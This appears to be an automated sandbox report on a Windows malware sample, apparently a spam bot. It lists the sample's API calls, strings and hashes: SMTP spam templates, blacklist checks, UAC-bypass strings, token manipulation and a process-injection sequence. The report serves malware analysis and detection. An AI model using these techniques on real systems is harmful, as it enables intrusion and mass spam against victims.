                                                                                        • Opcode Fuzzy Hash: 1858364a1cdefbaacc541077bd37e76054551c9f35b0601a5c3a379c44e8c607
                                                                                        • Instruction Fuzzy Hash: 7011A771A0121DBFDB559F65DC49F9B3BACEB497A8F004024FA05D7640D671DC008AB4
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,00000000,030F1839,030F9646), ref: 030F1012
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 030F10C2
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 030F10E1
                                                                                        • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 030F1101
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 030F1121
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 030F1140
                                                                                        • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 030F1160
                                                                                        • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 030F1180
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 030F119F
                                                                                        • GetProcAddress.KERNEL32(00000000,NtClose), ref: 030F11BF
                                                                                        • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 030F11DF
                                                                                        • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 030F11FE
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 030F121A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                        • API String ID: 2238633743-3228201535
                                                                                        • Opcode ID: dc3d589950ab8447ce836bdf55307fd6c9ed3bbbf69a170a8fc83d5146e91513
                                                                                        • Instruction ID: 0b4df3ed678178f30d8ad23ffd96527127d3adcbd51d16830fd810c7d1f024dd
                                                                                        • Opcode Fuzzy Hash: dc3d589950ab8447ce836bdf55307fd6c9ed3bbbf69a170a8fc83d5146e91513
                                                                                        • Instruction Fuzzy Hash: 57517D79647A01EFC79CEAA9E84075676E8678C329F18072A9570D26D9DBF0C0C1CF71
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 030FB2B3
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 030FB2C2
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 030FB2D0
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 030FB2E1
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 030FB31A
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 030FB329
                                                                                        • wsprintfA.USER32 ref: 030FB3B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                        • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                        • API String ID: 766114626-2976066047
                                                                                        • Opcode ID: d30459ebd0777d47419d8f9ba313e1d3146595dacb1914a33838ed229a216d40
                                                                                        • Instruction ID: 9b0c78a3e1dacaf6e126911edab25dbe6a473a72e7994278c24eff6c14d1f33a
                                                                                        • Opcode Fuzzy Hash: d30459ebd0777d47419d8f9ba313e1d3146595dacb1914a33838ed229a216d40
                                                                                        • Instruction Fuzzy Hash: 75514BB1D0121CAFCF54DFD4DA88AEEBBB9BF4C304F144099E605B6190D7B44A89CBA4
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                        • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                        • API String ID: 2400214276-165278494
                                                                                        • Opcode ID: d75d75994f471157f4289381a36affafe720b229021f93e544eb9e44672a9470
                                                                                        • Instruction ID: 8be2d244cd5b6c671645b848a181911db33d8768643c75336540695bb7755d4b
                                                                                        • Opcode Fuzzy Hash: d75d75994f471157f4289381a36affafe720b229021f93e544eb9e44672a9470
                                                                                        • Instruction Fuzzy Hash: 80614C72A40208AFDB60EFA4DC45FEA77E9FB4C305F144069FA69D6162DBB199408F60
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$send$lstrlenrecv
                                                                                        • String ID: .$ $AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                        • API String ID: 3650048968-4264063882
                                                                                        • Opcode ID: 31006b7dc6d9aa4c873f1383b21e853a72513fd8bd3c8fc0763be806c430da28
                                                                                        • Instruction ID: b2b12a56fc751f88aa90780dca935e0fa23948e8fa70a865fedf761909911d75
                                                                                        • Opcode Fuzzy Hash: 31006b7dc6d9aa4c873f1383b21e853a72513fd8bd3c8fc0763be806c430da28
                                                                                        • Instruction Fuzzy Hash: 35A18D31B06345AFDF60DA54DC84FFE77A9EB08308F180466FB0D66892DBB189898F51
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 030F139A
                                                                                        • lstrlenW.KERNEL32(-00000003), ref: 030F1571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShelllstrlen
                                                                                        • String ID: $%systemroot%\system32\cmd.exe$<$@$D$PDGu$uac$useless$wusa.exe
                                                                                        • API String ID: 1628651668-3716895483
                                                                                        • Opcode ID: 8db3f8a0e239da114eea6659e6f0d6aa57ebab34fdb1cc7356d3373d728be58f
                                                                                        • Instruction ID: 278e280c38c1db79950c4114ff017cbfb7bf0735511d06d54bc49b93605de7b9
                                                                                        • Opcode Fuzzy Hash: 8db3f8a0e239da114eea6659e6f0d6aa57ebab34fdb1cc7356d3373d728be58f
                                                                                        • Instruction Fuzzy Hash: B5F17AB5509341DFD328DF64C888BABB7E9FB88704F04492DF69697290D7B4D884CB62
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,7591F380), ref: 030F2A83
                                                                                        • HeapAlloc.KERNEL32(00000000,?,7591F380), ref: 030F2A86
                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 030F2AA0
                                                                                        • htons.WS2_32(00000000), ref: 030F2ADB
                                                                                        • select.WS2_32 ref: 030F2B28
                                                                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 030F2B4A
                                                                                        • htons.WS2_32(?), ref: 030F2B71
                                                                                        • htons.WS2_32(?), ref: 030F2B8C
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 030F2BFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                        • String ID:
                                                                                        • API String ID: 1639031587-0
                                                                                        • Opcode ID: 64c98108d00da0c6e52fbf2f595d5774a6356fb9b1e6c29f615895a09b88dee2
                                                                                        • Instruction ID: 457b33047db6968f5fee205c660ceef8ce70638cd5698593633847ebebbf900c
                                                                                        • Opcode Fuzzy Hash: 64c98108d00da0c6e52fbf2f595d5774a6356fb9b1e6c29f615895a09b88dee2
                                                                                        • Instruction Fuzzy Hash: 7C61BD79906305AFC720EF65D808B6BBBECEB8C745F050D09FA8997540D7B5D8808BE2
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,75920F10,?,75920F10,00000000), ref: 030F70C2
                                                                                        • RegEnumValueA.ADVAPI32(75920F10,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,75920F10,00000000), ref: 030F719E
                                                                                        • RegCloseKey.ADVAPI32(75920F10,?,75920F10,00000000), ref: 030F71B2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 030F7208
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 030F7291
                                                                                        • ___ascii_stricmp.LIBCMT ref: 030F72C2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 030F72D0
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 030F7314
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 030F738D
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 030F73D8
                                                                                          • Part of subcall function 030FF1A5: lstrlenA.KERNEL32(000000C8,000000E4,031022F8,000000C8,030F7150,?), ref: 030FF1AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                        • String ID: $"
                                                                                        • API String ID: 4293430545-3817095088
                                                                                        • Opcode ID: 9a54f407b71e934f32ac90c6223936e489e59f1461b7eaf9630e6cfc75e1b421
                                                                                        • Instruction ID: dca81e5cee46b4ffefa48f6b4ef1eff9e3cae4fbe9fc07c10851af7ec141a3cc
                                                                                        • Opcode Fuzzy Hash: 9a54f407b71e934f32ac90c6223936e489e59f1461b7eaf9630e6cfc75e1b421
                                                                                        • Instruction Fuzzy Hash: 72B1BF72802209BFDB55EFA4DC44BEEB7BCEF48740F140466F600E6490EB759A84CB65
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 030FAD98
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 030FADA6
                                                                                          • Part of subcall function 030FAD08: gethostname.WS2_32(?,00000080), ref: 030FAD1C
                                                                                          • Part of subcall function 030FAD08: lstrlenA.KERNEL32(?), ref: 030FAD60
                                                                                          • Part of subcall function 030FAD08: lstrlenA.KERNEL32(?), ref: 030FAD69
                                                                                          • Part of subcall function 030FAD08: lstrcpyA.KERNEL32(?,LocalHost), ref: 030FAD7F
                                                                                          • Part of subcall function 030F30B5: gethostname.WS2_32(?,00000080), ref: 030F30D8
                                                                                          • Part of subcall function 030F30B5: gethostbyname.WS2_32(?), ref: 030F30E2
                                                                                        • wsprintfA.USER32 ref: 030FAEA5
                                                                                          • Part of subcall function 030FA7A3: inet_ntoa.WS2_32(00000000), ref: 030FA7A9
                                                                                        • wsprintfA.USER32 ref: 030FAE4F
                                                                                        • wsprintfA.USER32 ref: 030FAE5E
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(?,?,00000000,?,?), ref: 030FEF92
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(?), ref: 030FEF99
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(00000000), ref: 030FEFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                        • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                        • API String ID: 3631595830-1816598006
                                                                                        • Opcode ID: 49e3d92dc76d879c8b8c4763a3e7bf1289c68a4a8ab1f4f811c27530c58e14cb
                                                                                        • Instruction ID: c3d42ba4ad306946163e2cde248eabf4a2e50698ac999f67a8593d3eace1a9cf
                                                                                        • Opcode Fuzzy Hash: 49e3d92dc76d879c8b8c4763a3e7bf1289c68a4a8ab1f4f811c27530c58e14cb
                                                                                        • Instruction Fuzzy Hash: FB412BB690030CAFDB25EFA0DC45FEE3BADBB4C304F14042ABA2996151EA71D954CB60
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(iphlpapi.dll,759223A0,?,000DBBA0,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2E01
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2E11
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 030F2E2E
                                                                                        • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2E4C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2E4F
                                                                                        • htons.WS2_32(00000035), ref: 030F2E88
                                                                                        • inet_addr.WS2_32(?), ref: 030F2E93
                                                                                        • gethostbyname.WS2_32(?), ref: 030F2EA6
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2EE3
                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2EE6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                        • String ID: GetNetworkParams$iphlpapi.dll
                                                                                        • API String ID: 929413710-2099955842
                                                                                        • Opcode ID: 3f72271cd710b9907a09efd567c6fec9fa9d3b621cc0327f31f523b031c0da8f
                                                                                        • Instruction ID: e296afd0bf2a95cfa5875d32748b346057db1ed7faf07628dbc2c9c82e418ddf
                                                                                        • Opcode Fuzzy Hash: 3f72271cd710b9907a09efd567c6fec9fa9d3b621cc0327f31f523b031c0da8f
                                                                                        • Instruction Fuzzy Hash: FA31D639A01609AFDB50EBB8D844B6FB7FCAF0C369F284515FA14E7680DB70D5818B60
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,?,030F9DD7,?,00000022,?,?,00000000,00000001), ref: 030F9340
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,030F9DD7,?,00000022,?,?,00000000,00000001), ref: 030F936E
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,030F9DD7,?,00000022,?,?,00000000,00000001), ref: 030F9375
                                                                                        • wsprintfA.USER32 ref: 030F93CE
                                                                                        • wsprintfA.USER32 ref: 030F940C
                                                                                        • wsprintfA.USER32 ref: 030F948D
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 030F94F1
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 030F9526
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 030F9571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID: runas
                                                                                        • API String ID: 3696105349-4000483414
                                                                                        • Opcode ID: 72d9b93c07576ba8b4716d70f164c1e44c30144d662a90838a7762c620e53dfa
                                                                                        • Instruction ID: 65cb863bf11153161bbb50dc14e1c950c18a07d969feb51aac4246255e24b09b
                                                                                        • Opcode Fuzzy Hash: 72d9b93c07576ba8b4716d70f164c1e44c30144d662a90838a7762c620e53dfa
                                                                                        • Instruction Fuzzy Hash: 41A18DB2941208AFEB25EFA0CC85FEE3BACFB48745F140426FB1596151E7B5D584CBA0
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F2078
                                                                                        • GetTickCount.KERNEL32 ref: 030F20D4
                                                                                        • GetTickCount.KERNEL32 ref: 030F20DB
                                                                                        • GetTickCount.KERNEL32 ref: 030F212B
                                                                                        • GetTickCount.KERNEL32 ref: 030F2132
                                                                                        • GetTickCount.KERNEL32 ref: 030F2142
                                                                                          • Part of subcall function 030FF04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,030FE342,00000000,7508EA50,80000001,00000000,030FE513,?,00000000,00000000,?,000000E4), ref: 030FF089
                                                                                          • Part of subcall function 030FF04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,030FE342,00000000,7508EA50,80000001,00000000,030FE513,?,00000000,00000000,?,000000E4,000000C8), ref: 030FF093
                                                                                          • Part of subcall function 030FE854: lstrcpyA.KERNEL32(00000001,?,?,030FD8DF,00000001,localcfg,except_info,00100000,03100264), ref: 030FE88B
                                                                                          • Part of subcall function 030FE854: lstrlenA.KERNEL32(00000001,?,030FD8DF,00000001,localcfg,except_info,00100000,03100264), ref: 030FE899
                                                                                          • Part of subcall function 030F1C5F: wsprintfA.USER32 ref: 030F1CE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                        • String ID: localcfg$net_type$rbl_bl$rbl_ip$~k
                                                                                        • API String ID: 3976553417-173824088
                                                                                        • Opcode ID: 0137029bd4a15e733e066b18bb4751f7312fdb4e8eccd9d3bda8664d7fa80d4f
                                                                                        • Instruction ID: e4bb791799703f8a1dc8a5e1164b064dd25041b23ef455a527e262f10a625151
                                                                                        • Opcode Fuzzy Hash: 0137029bd4a15e733e066b18bb4751f7312fdb4e8eccd9d3bda8664d7fa80d4f
                                                                                        • Instruction Fuzzy Hash: BE51163950634A5FE76CFF74ED49B963BDCAB4C318F080C29E7018A995DBF49085CA25
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 030FB467
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(?,?,00000000,?,?), ref: 030FEF92
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(?), ref: 030FEF99
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(00000000), ref: 030FEFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$wsprintf
                                                                                        • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                        • API String ID: 1220175532-2340906255
                                                                                        • Opcode ID: 7f933d6c7fe5fdfb0028c6b53adb01c05835f594b9dfbcefa3462e3d7919e82c
                                                                                        • Instruction ID: cd40cbc5a061de09dbd576dbbfd99ac9dd865d460db5f5e2c87b669bef105693
                                                                                        • Opcode Fuzzy Hash: 7f933d6c7fe5fdfb0028c6b53adb01c05835f594b9dfbcefa3462e3d7919e82c
                                                                                        • Instruction Fuzzy Hash: 70417BB65022197FDF00EAA4CCC1EFF7B6CEF8D688B140015FA14A6451DB70AA1887B1
                                                                                        APIs
                                                                                          • Part of subcall function 030FA4C7: GetTickCount.KERNEL32 ref: 030FA4D1
                                                                                          • Part of subcall function 030FA4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 030FA4FA
                                                                                        • GetTickCount.KERNEL32 ref: 030FC31F
                                                                                        • GetTickCount.KERNEL32 ref: 030FC32B
                                                                                        • GetTickCount.KERNEL32 ref: 030FC363
                                                                                        • GetTickCount.KERNEL32 ref: 030FC378
                                                                                        • GetTickCount.KERNEL32 ref: 030FC44D
                                                                                        • InterlockedIncrement.KERNEL32(030FC4E4), ref: 030FC4AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,030FB535,00000000,?,030FC4E0), ref: 030FC4C1
                                                                                        • CloseHandle.KERNEL32(00000000,?,030FC4E0,03103588,030F8810), ref: 030FC4CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1553760989-1857712256
                                                                                        • Opcode ID: a6cd8518a9d53179a2d83b6936451fc892ea3f26d9c97dacc5e0872812b1504a
                                                                                        • Instruction ID: bf82991ab0eacfafb016585ad3a34bcc4699a7c2122daf49c4e3915844c22eff
                                                                                        • Opcode Fuzzy Hash: a6cd8518a9d53179a2d83b6936451fc892ea3f26d9c97dacc5e0872812b1504a
                                                                                        • Instruction Fuzzy Hash: 0F5178B1A02B458FE764DF69C5C552ABBE9FB48240B544D2EE28BC7E90D770F8408B14
                                                                                        APIs
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 030FBE4F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 030FBE5B
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 030FBE67
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 030FBF6A
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 030FBF7F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 030FBF94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                        • API String ID: 1586166983-1625972887
                                                                                        • Opcode ID: 1f315daeed99df34d4a3a8eefa1e4ccd68eb441fbd8969630f424e4830aea1b5
                                                                                        • Instruction ID: 769a048f685401a256a85eff76778cd8c88f1a64718ff55e595c687d1e6f1928
                                                                                        • Opcode Fuzzy Hash: 1f315daeed99df34d4a3a8eefa1e4ccd68eb441fbd8969630f424e4830aea1b5
                                                                                        • Instruction Fuzzy Hash: EF510775A0230AEFCB15DFA4CD40B9EBBE9AF48344F084055EA01EBA51D770E945CFA0
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75918A60,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6A7D
                                                                                        • GetDiskFreeSpaceA.KERNEL32(030F9E9D,030F9A60,?,?,?,031022F8,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6ABB
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B40
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B4E
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B5F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B6F
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B7D
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B80
                                                                                        • GetLastError.KERNEL32(?,?,?,030F9A60,?,?,030F9E9D,?,?,?,?,?,030F9E9D,?,00000022,?), ref: 030F6B96
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 3188212458-0
                                                                                        • Opcode ID: 96e93f9106d965a013baf42a09c0776fdd4655c6980073fbdfb16ff985a8627b
                                                                                        • Instruction ID: 31ceaaa1b4c9aa8ac3c20e20550c598e7d35141d37ad9eb0253e8a50b21187de
                                                                                        • Opcode Fuzzy Hash: 96e93f9106d965a013baf42a09c0776fdd4655c6980073fbdfb16ff985a8627b
                                                                                        • Instruction Fuzzy Hash: 4E31F2B690224DBFCB05EFA0CD44ADFBBB9EB8D304F084566E311A7604D77189858BA1
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,030FD7C3), ref: 030F6F7A
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,030FD7C3), ref: 030F6FC1
                                                                                        • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 030F6FE8
                                                                                        • LocalFree.KERNEL32(00000120), ref: 030F701F
                                                                                        • wsprintfA.USER32 ref: 030F7036
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                        • String ID: /%d$|
                                                                                        • API String ID: 676856371-4124749705
                                                                                        • Opcode ID: 5ed46c992464c812da931850df52018f19c66fa54ae4d90312fdf38fa3126684
                                                                                        • Instruction ID: 7b37edd91db70f0f2ec0a59be0e28e717eedf1602e452044fd82e42c5bc8f968
                                                                                        • Opcode Fuzzy Hash: 5ed46c992464c812da931850df52018f19c66fa54ae4d90312fdf38fa3126684
                                                                                        • Instruction Fuzzy Hash: 2F311876900209EFDB01DFA8D848BDE7BBCEF08254F048166FA19DB505EA75D608CBA4
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,031022F8,000000E4,030F6DDC,000000C8), ref: 030F6CE7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 030F6CEE
                                                                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 030F6D14
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 030F6D2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                        • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                        • API String ID: 1082366364-3395550214
                                                                                        • Opcode ID: 0dd942aec7cd1beeff51d31fe5ed956e8ccc3bbff66c3c302f8cc4239ff3f677
                                                                                        • Instruction ID: c43e90c34f75d57f6c9ef670867c4f96f85c9132967204dec9b10d47eb48bf49
                                                                                        • Opcode Fuzzy Hash: 0dd942aec7cd1beeff51d31fe5ed956e8ccc3bbff66c3c302f8cc4239ff3f677
                                                                                        • Instruction Fuzzy Hash: DE21DA65A823487EF765E6219CCCFBB6E8D8F4E649F0C0444F6047A485CBEA84C682B5
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,030F9947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,031022F8), ref: 030F97B1
                                                                                        • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,031022F8), ref: 030F97EB
                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,031022F8), ref: 030F97F9
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,031022F8), ref: 030F9831
                                                                                        • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,031022F8), ref: 030F984E
